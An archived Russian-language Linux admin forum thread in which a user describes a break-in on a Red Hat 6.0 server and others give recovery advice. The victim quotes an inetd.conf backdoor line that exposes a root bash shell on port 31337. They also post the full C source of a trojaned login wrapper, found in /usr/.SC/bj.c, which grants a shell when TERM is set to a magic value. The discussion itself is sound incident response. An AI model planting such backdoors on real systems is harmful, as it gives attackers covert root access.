LINUX.ORG.RU
ФорумAdmin

Меня ломанули


0

0

Админы, как правильно настроить защиту сервера?
Ночью меня вскрыли. messages чист, сообщения перенаправлены в null, в inetd.conf открыли доступ через telnet:

31337 stream tcp nowait root /bin/bash bash -i
telnet stream tcp nowait root /usr/sbin/in.telnetd in.telnetd
хотя до этого он был закрыт, ftp тоже закрыт.
Утром сервер занимался прощупыванием или вскрытием других машин в сети на 111 порту.
ps работает не правильно, видать заменен.
Bind обновлялся. Чем-то похоже на Lion - тоже сканирует другие машины в сети, но явно не он - его следов нет.
Система Red Hat Linux 6.0
У кого подобное было или кто знает, что делать?
Сейчас подправил inetd.conf, сменил пароли, в rc.sysinit закоментировал перенаправление сообщений в null.
До этого кто-то активно пытался пролезть через ftp.

anonymous

netstat -lntp что выдает??? Если скажет что какая-то опция неправильная - значит его тоже подменили. А вообще должно показать все открытые порты.

Ale
()

Порты показывает, вроде правильно
Yuriy

anonymous
()

syslogd login sshd ls du ps pstree killall top netstat вот эти бинрники чаще всего заменяют ! а еще посмотри на наличие процессов запущенных с именем : [httpd] или что то похоже ! или например на предмет запущенных программ из /usr/doc/, и наконец новых юзеров с id=0 и gid=0 :-) и удачи !в этом нелегком деле ! восстановлении сервера :-))

anonymous
()

Какой версии bind ?
На мой взгляд лучше все снести и заново поставить с последним bind,
чем тратить время на выискивание следов.
Кстати, RH6.0 часто ломают, по крайней мере, в этом форуме это не
первое сообщение о взломе, и даже не третье.

anonymous
()

Вообще в таких случаях советуют полностью переставлять сервер с trusted media так как могут остаться трояны

anonymous
()

Сервер переставлялся недавно, сразу же обновлялся BIND. А какие программы или методы используются для защиты от сканирования свободных портов? Потому что мне приходят письма - типа того, что вы проявляли подозрительную активность по отношению к такому-то по 111 порту. Значит, это можно отследить. Что это вообще за порт? Как закрыть все лишнее?
PS. А можно сделать upgrade на Red Hat 7.0? При этом замененные файлы по идее должны восстановиться... Настройки сервера останутся в силе или нет? Вот только если троян...

Yuriy

anonymous
()

В каталоге /usr есть каталог .SC с файлом bj.c
Я пока еще не специалист в Линуксе, но что-то тут явно не то, ИМХО.
Могу привести текст файла:
#define _XOPEN_SOURCE
#include <unistd.h>
#include <stdio.h>
#include <signal.h>
#include <sys/time.h>
#include <string.h>
#define SHELL "/bin/sh"
#define SHELL_CALLME "login"
#define LOGIN "/sbin/login"
#define LOGIN_CALLME "login"
#define ENV_NAME "TERM"
#define ENV_VALUE "mc1a"
#define ENV_FIX "vt100"


int owned(void);
char **av, **ep;
int main(int argc, char **argv, char **envp) {
av=argv;
ep=envp;
av[0]=SHELL_CALLME;

if (owned()) {
char *sav[]={ SHELL_CALLME, NULL };
execve(SHELL, sav, ep);
return 0;
}

execve(LOGIN, av, ep);
return 0;

}

int owned(void) {
char *name, *value;
int i;
for (i=0; ep[i]!=NULL; ++i) {
name=strtok(ep[i], "=");
value=strtok(NULL, "=");
if (name==NULL || value==NULL) continue;
if (!strncmp(name, ENV_NAME, strlen(ENV_NAME))) {
if (!strncmp(value, ENV_VALUE, strlen(ENV_VALUE))) {
char tmp[100];
sprintf(tmp, "%s=%s", ENV_NAME, ENV_FIX);
ep[i]=strdup(tmp);
return 1;
}
}
}


return 0;
}

Может у кого есть идеи?

anonymous
()

Проверь все с помощью rpm.
пока не проверишь с помощью rpm - не верь ни одной утилите типа ps netstat top и т.д.
когда проверишь - тоже не верь...

а лучше переустановить сервак полностью!

bind - chroot&update !

desperado
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.
Admin